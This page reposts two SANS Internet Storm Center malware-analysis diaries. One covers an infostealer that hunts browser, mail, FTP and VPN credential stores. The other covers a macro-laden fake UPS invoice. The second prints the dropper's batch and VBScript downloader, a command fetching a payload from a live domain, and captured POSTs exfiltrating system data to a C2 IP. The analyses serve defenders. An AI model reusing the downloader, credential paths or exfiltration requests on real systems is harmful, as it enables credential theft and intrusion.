Blog

Archive for January 9th, 2020

More Data Exfiltration, (Fri, Jan 10th)

Yesterday,  I posted a quick analysis of a malicious document that exfiltrates data from the compromised computer[1]. Here is another found that also exfiltrate data. The malware is delivered in an ACE archive. This file format remains common in phishing campaigns because the detection rate is lower at email gateways (many of them can’t handle the file format). The archive contains a PE file called ‘Payment Copy.exe’ (SHA256:88a6e2fd417d145b55125338b9f53ed3e16a6b27fae9a3042e187b5aa15d27aa). The payload is unknown on VT at this time.

The list of searched files and registry keys is interesting. Many credentials databases and files are tested by the malware. Here is a list of extracted paths:

%USERPROFILE%AppDataLocalGoogleChromeUser DataLOGIN DATA
%USERPROFILE%AppDataRoamingMozillaFirefoxProfiles4lddcdcq.hh3fwg7c.defaultLOGINS.JSON
%USERPROFILE%AppDataLocalTENCENTQQBROWSERUSER DATADEFAULTENCRYPTEDSTORAGE
%USERPROFILE%AppDataRoamingOPERA SOFTWAREOPERA STABLELOGIN DATA
%USERPROFILE%AppDataLocalYANDEXYANDEXBROWSERUSER DATA
%USERPROFILE%AppDataLocal360CHROMECHROMEUSER DATA
%USERPROFILE%AppDataLocalIRIDIUMUSER DATA
%USERPROFILE%AppDataLocalCOMODODRAGONUSER DATA
%USERPROFILE%AppDataLocalMAPLESTUDIOCHROMEPLUSUSER DATA
%USERPROFILE%AppDataLocalCHROMIUMUSER DATA
%USERPROFILE%AppDataLocalTORCHUSER DATA
%USERPROFILE%AppDataLocal7STAR7STARUSER DATA
%USERPROFILE%AppDataLocalAMIGOUSER DATA
%USERPROFILE%AppDataLocalBRAVESOFTWAREBRAVE-BROWSERUSER DATA
%USERPROFILE%AppDataLocalCENTBROWSERUSER DATA
%USERPROFILE%AppDataLocalCHEDOTUSER DATA
%USERPROFILE%AppDataLocalCOCCOCBROWSERUSER DATA
%USERPROFILE%AppDataLocalELEMENTS BROWSERUSER DATA
%USERPROFILE%AppDataLocalEPIC PRIVACY BROWSERUSER DATA
%USERPROFILE%AppDataLocalKOMETAUSER DATA
%USERPROFILE%AppDataLocalORBITUMUSER DATA
%USERPROFILE%AppDataLocalSPUTNIKSPUTNIKUSER DATA
%USERPROFILE%AppDataLocalUCOZMEDIAURANUSER DATA
%USERPROFILE%AppDataLocalVIVALDIUSER DATA
%USERPROFILE%AppDataLocalCATALINAGROUPCITRIOUSER DATA
%USERPROFILE%AppDataLocalLIEBAOUSER DATA
%USERPROFILE%AppDataLocalFENRIR INCSLEIPNIR5SETTINGMODULESCHROMIUMVIEWER
%USERPROFILE%AppDataLocalQIP SURFUSER DATA
%USERPROFILE%AppDataLocalCOOWONCOOWONUSER DATA
%USERPROFILE%AppDataRoamingMozillaSEAMONKEYPROFILES.INI
%USERPROFILE%AppDataRoamingFLOCKBROWSERPROFILES.INI
%USERPROFILE%AppDataLocalUCBROWSER
%USERPROFILE%AppDataRoamingNETGATE TECHNOLOGIESBLACKHAWKPROFILES.INI
%USERPROFILE%AppDataRoaming8PECXSTUDIOSCYBERFOXPROFILES.INI
%USERPROFILE%AppDataRoamingK-MELEONPROFILES.INI
%USERPROFILE%AppDataRoamingMozillaICECATPROFILES.INI
%USERPROFILE%AppDataRoamingCOMODOICEDRAGONPROFILES.INI
%USERPROFILE%AppDataRoamingMOONCHILD PRODUCTIONSPALE MOONPROFILES.INI
%USERPROFILE%AppDataRoamingWATERFOXPROFILES.INI
%USERPROFILE%AppDataLocalFALKONPROFILESPROFILES.INI
SubsystemProfilesOutlook9375CFF0413111d3B88A00104B2A66760000002POP3 Password
%USERPROFILE%AppDataRoamingTHUNDERBIRDPROFILES.INI
%USERPROFILE%AppDataLocalVIRTUALSTOREPROGRAM FILESFOXMAILMAIL
%USERPROFILE%AppDataLocalVIRTUALSTOREPROGRAM FILES (X86)FOXMAILMAIL
%USERPROFILE%AppDataRoamingOPERA MAILOPERA MAILWAND.DAT
%USERPROFILE%AppDataRoamingPOCOMAILACCOUNTS.INI
%USERPROFILE%AppDataRoamingTHE BAT!
%USERPROFILE%AppDataRoamingPOSTBOXPROFILES.INI
%USERPROFILE%AppDataRoamingCLAWS-MAIL
%USERPROFILE%AppDataRoamingCLAWS-MAILCLAWSRC
%USERPROFILE%AppDataLocalTempFOLDER.LST
%USERPROFILE%AppDataRoamingTRILLIANUSERSGLOBALACCOUNTS.DAT
%USERPROFILE%AppDataRoamingPSIPROFILES
%USERPROFILE%AppDataRoamingPSI+PROFILES
%USERPROFILE%AppDataRoamingIPSWITCHWS_FTPSITESWS_FTP.INI
%USERPROFILE%AppDataRoamingCOREFTPSITES.IDX
C:FTP NAVIGATORFTPLIST.TXT
%USERPROFILE%AppDataRoamingFLASHFXP3QUICK.DAT
%USERPROFILE%AppDataRoamingSMARTFTPCLIENT 2.0FAVORITESQUICK CONNECT
C:CFTPFTPLIST.TXT
%USERPROFILE%AppDataRoamingFTPGETTERSERVERS.XML
C:Program Files (x86)JDOWNLOADERCONFIGDATABASE.SCRIPT
%USERPROFILE%AppDataLocalTempLOG.TMP
REGISTRYUSERS-1-5-21-2529703413-2662079939-3113469119-500SoftwareMicrosoftWindows NTCurrentVersionWindows Messaging 
REGISTRYUSERS-1-5-21-2529703413-2662079939-3113469119-500SoftwareAerofoxFoxmailPreview
REGISTRYUSERS-1-5-21-2529703413-2662079939-3113469119-500SoftwareAerofoxFoxmailV3.1 
REGISTRYUSERS-1-5-21-2529703413-2662079939-3113469119-500SoftwareIncrediMailIdentities 
REGISTRYUSERS-1-5-21-2529703413-2662079939-3113469119-500SoftwareQualcommEudoraCommandLine 
REGISTRYUSERS-1-5-21-2529703413-2662079939-3113469119-500SoftwareRimArtsB2Settings 
REGISTRYUSERS-1-5-21-2529703413-2662079939-3113469119-500SoftwareOpenVPN-GUIconfigs 
REGISTRYUSERS-1-5-21-2529703413-2662079939-3113469119-500SOFTWAREMartin PrikrylWinSCP 2Sessions 
REGISTRYUSERS-1-5-21-2529703413-2662079939-3113469119-500SoftwareFTPWareCOREFTPSites 
REGISTRYUSERS-1-5-21-2529703413-2662079939-3113469119-500SoftwareDownloadManagerPasswords 

Who said that the browser market is restricted to IE, Firefox, Chrome, Safari & Opera?

Another tool used by the malware attracted my attention: ‘plutil.exe’. It’s a tool that is part of the Apple Application Support 32-bit program. This tool is completely legit and is available when you install an Apple software on your Windows system (Safari, iCloud, …). Its purpose is to process Properly List files[2] used by Apple.

C:Program Files (x86)Common FilesAppleApple Application Supportplutil.exe -convert xml1 -s -o 
   “%USERPROFILE%AppDataLocalTempfixed_keychain.xml” 
   “%USERPROFILE%AppDataRoamingApple ComputerPreferenceskeychain.plist”

It could be a good idea to track access to these paths by uncommon process names (example via a Sysmon specific configuration)

[1] https://isc.sans.edu/forums/diary/Quick+Analyzis+of+another+Maldoc/25694/
[2] https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/AboutInformationPropertyListFiles.html

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Quick Analyzis of a(nother) Maldoc, (Thu, Jan 9th)

Yesterday, one of our readers (thank David!) submitted to us a malicious document disguised as a UPS invoice. Like David, do not hesitate to share samples with us, we like malware samples! I briefly checked the document. Nothing new, based on a classic macro, it was easy to analyze and I can give you an overview of the infection process and what kind of data can be exfiltrated.

The malicious document was called ‘ups_invoice_0701932_262.doc’ (SHA256:be0939cbb5ba129ef316149adc474b00ad9f526513a6f6f6f6adc802290c02af) and has a current VT score of 10/61[1]. It contained some macros that, once the document opened, perform the malicious activity:

# oledump.py ups_invoice_0701932_262_doc 
A: word/vbaProject.bin
 A1:       734 'PROJECT'
 A2:        30 'PROJECTlk'
 A3:       233 'PROJECTwm'
 A4:        97 'UserForm1/x01CompObj'
 A5:       294 'UserForm1/x03VBFrame'
 A6:       883 'UserForm1/f'
 A7:      6688 'UserForm1/o'
 A8: M    1453 'VBA/Module1'
 A9: M   21943 'VBA/Module2'
A10: M    2239 'VBA/Module3'
A11: M    2331 'VBA/Module4'
A12: M  252836 'VBA/NewMacros'
A13: m     938 'VBA/ThisDocument'
A14: m    1493 'VBA/UserForm1'
A15:      8300 'VBA/_VBA_PROJECT'
A16:      1302 'VBA/dir'
A17: M  412655 'VBA/wLoadImages'

 

The infection path is the following: Word > Macro > Batch File (.cmd) >VBScript > Windows PE

The macro dumps a batch file on the disk (SHA256:96d785cdc95bff2f081f57d2c9fdee3b76daf1c3295d2b9e6298678ed32953b9). The dropped file is ‘%APPDATA%..EnableDelayedExpansionDocuments1.CMD’ Most of the commands are simpe “echo” that are used to create a VBS script ‘%APPDATA%..EnableDelayedExpansiongditbits.vbs’.

Sample of code with garbage words to make it more difficult to read:

@echo off
echo "93319427177886784668351442764871949889113678316627428857276359"
set mtspf=%APPDATA%..EnableDelayedExpansiongdibits.vbs
echo 'To determine H. pylori resistance to clarithromycin >> %mtspf%
echo 'were designed against the 23S rRNA gene >> %mtspf%
echo Dim hResBit, MpicOffer, xmpage, MenuPrice, ListPrice, Fundament, BufferBat >> %mtspf%
echo On Error Resume Next >> %mtspf%
echo. >> %mtspf%
echo Set hResBit = Wscript.Arguments >> %mtspf%
echo 'To determine H. pylori resistance to clarithromycin >> %mtspf%
echo 'were designed against the 23S rRNA gene >> %mtspf%
echo "471495911668846928514952834168735538343318577458669595"
echo "137756746277365597113689825816848246219143776556384827"
echo "589196889244714223435471453592227671689523411938182673"
echo "714793381962982623587978735968646573151481843754943393"
echo Set MpicOffer = CreateObject("MSXML2.ServerXMLHTTP.6.0") >> %mtspf%
echo "72797134559562738358938549883642286878881617597196952189815336"
echo ListPrice = hResBit(0) >> %mtspf%
echo Fundament = hResBit(1) >> %mtspf%
echo 'The most common question that restaurants are asking us revolve >> %mtspf%
echo 'special accommodations) that may be requested >> %mtspf%
echo. >> %mtspf%
echo MpicOffer.Open "GET", ListPrice, False >> %mtspf%

 

Then the VBS script is launched with two arguments (see above the Wscript.Arguments):

cscript //nologo %APPDATA%..EnableDelayedExpansiongdibits.vbs hxxps://greatingusa[.]com/red1.res %APPDATA%..EnableDelayedExpansionhddput8.exe

Finally, hddput8.exe is launched:

start %APPDATA%..EnableDelayedExpansionhddput8.exe"

The PE file (SHA256:cfd98c1ee7ab19a63b31bcb6be133e6b61ce723f94a8f91741983bf79b4d1158) has a VT score of 44/72[2]

Here are same POST HTTP requests with exfiltrated data performed by the malware:

POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/90 HTTP/1.1
Content-Type: multipart/form-data; boundary=aksgja8s8d8a8s97
User-Agent: KSKJJGJ
Host: 203.176.135.102:8082
Content-Length: 4419
Cache-Control: no-cache

--aksgja8s8d8a8s97
Content-Disposition: form-data; name="proclist"

***TASK LIST***

[System Process]
System
smss.exe
csrss.exe
wininit.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
lsm.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
spoolsv.exe
svchost.exe
taskhost.exe
dwm.exe
svchost.exe
svchost.exe
svchost.exe
notepad.exe
calc.exe
svchost.exe
notepad.exe
explorer.exe
iexplore.exe
WmiPrvSE.exe
rundll32.exe
svchost.exe

--aksgja8s8d8a8s97
Content-Disposition: form-data; name="sysinfo"

***S Y S T E M I N F O***

HostName: 3OwiR2Q
OSName: Microsoft Windows 7 Professional 
OSVersion: Service Pack 1
OSArchitecture: 64-bit
ProductType: Workstation
BuildType: Multiprocessor Free
RegisteredOwner: Zahwl3xniYy
RegisteredOrg: CVDh5l614
SerialNumber: 00371-222-2524677-68218
InstallDate: 30/12/1899 00.00.00
LastBootUpTime: 30/12/1899 00.00.00
WindowsDirectory: C:Windows
SystemDirectory: C:Windowssystem32
BootDevice: DeviceHarddiskVolume1
TotalPhysicalMemory: 3127 Mb
AvailablePhysicalMemory: 3127 Mb


/c ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : 
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Realtek RTL8139C+ Fast Ethernet NIC
   Physical Address. . . . . . . . . : 
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : (Preferred) 
   IPv4 Address. . . . . . . . . . . : 192.168.100.6(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : Thursday, January 09, 2019 6:19:19 AM
   Lease Expires . . . . . . . . . . : Thursday, January 16, 2156 1:08:23 AM
   Default Gateway . . . . . . . . . : 192.168.100.1
   DHCP Server . . . . . . . . . . . : 192.168.100.1
   DHCPv6 IAID . . . . . . . . . . . : 240276480
   DHCPv6 Client DUID. . . . . . . . : 
   DNS Servers . . . . . . . . . . . : 8.8.8.8
   NetBIOS over Tcpip. . . . . . . . : Disabled


/c net config workstation
Computer name                        \
Full Computer name                   
User name                            Administrator

Workstation active on                
Software version                     Windows 7 Professional

Workstation domain                   WORKGROUP
Workstation Domain DNS Name          .com
Logon domain                         TESTER

COM Open Timeout (sec)               0
COM Send Count (byte)                16
COM Send Timeout (msec)              250

The command completed successfully.

/c net view /all
There are no entries in the list.

/c net view /all /domain
There are no entries in the list.

/c nltest /domain_trusts
Enumerating domain trusts failed: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF

/c nltest /domain_trusts /all_trusts
Enumerating domain trusts failed: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF

--aksgja8s8d8a8s97--

HTTP/1.1 200 OK
server: Cowboy
date: Thu, 09 Jan 2020 09:41:52 GMT
content-length: 3
Content-Type: text/plain

/1/

 

POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/81/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 203.176.135.102
Connection: close
Content-Type: multipart/form-data; boundary=---------PAOUUIBNQKZQDUJR
Content-Length: 210

-----------PAOUUIBNQKZQDUJR
Content-Disposition: form-data; name="data"

-----------PAOUUIBNQKZQDUJR
Content-Disposition: form-data; name="source"

OpenSSH private keys
-----------PAOUUIBNQKZQDUJR--

HTTP/1.1 200 OK
connection: close
server: Cowboy
date: Thu, 09 Jan 2020 09:42:07 GMT
content-length: 3
Content-Type: text/plain

/1/

 

POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/83/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 203.176.135.102
Connection: close
Content-Type: multipart/form-data; boundary=---------QPKAEZSIUTKMSAWM
Content-Length: 299

-----------QPKAEZSIUTKMSAWM
Content-Disposition: form-data; name="formdata"

{]}

-----------QPKAEZSIUTKMSAWM
Content-Disposition: form-data; name="billinfo"

{]}
-----------QPKAEZSIUTKMSAWM
Content-Disposition: form-data; name="cardinfo"

{SQL logic error
-----------QPKAEZSIUTKMSAWM--

HTTP/1.1 200 OK
connection: close
server: Cowboy
date: Thu, 09 Jan 2020 09:41:16 GMT
content-length: 3
Content-Type: text/plain

/1/

 

POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/81/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 203.176.135.102
Connection: close
Content-Type: multipart/form-data; boundary=---------ITSDTHZDVZQGMVVI
Content-Length: 219

-----------ITSDTHZDVZQGMVVI
Content-Disposition: form-data; name="data"

-----------ITSDTHZDVZQGMVVI
Content-Disposition: form-data; name="source"

OpenVPN passwords and configs
-----------ITSDTHZDVZQGMVVI--

HTTP/1.1 200 OK
connection: close
server: Cowboy
date: Thu, 09 Jan 2020 09:41:41 GMT
content-length: 3
Content-Type: text/plain

/1/

Note that, at the time I’m writing this diary, the domain ‘greatingusa[.]com’ is still active. 

[1] https://www.virustotal.com/gui/file/be0939cbb5ba129ef316149adc474b00ad9f526513a6f6f6f6adc802290c02af/detection
[2] https://www.virustotal.com/gui/file/cfd98c1ee7ab19a63b31bcb6be133e6b61ce723f94a8f91741983bf79b4d1158/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →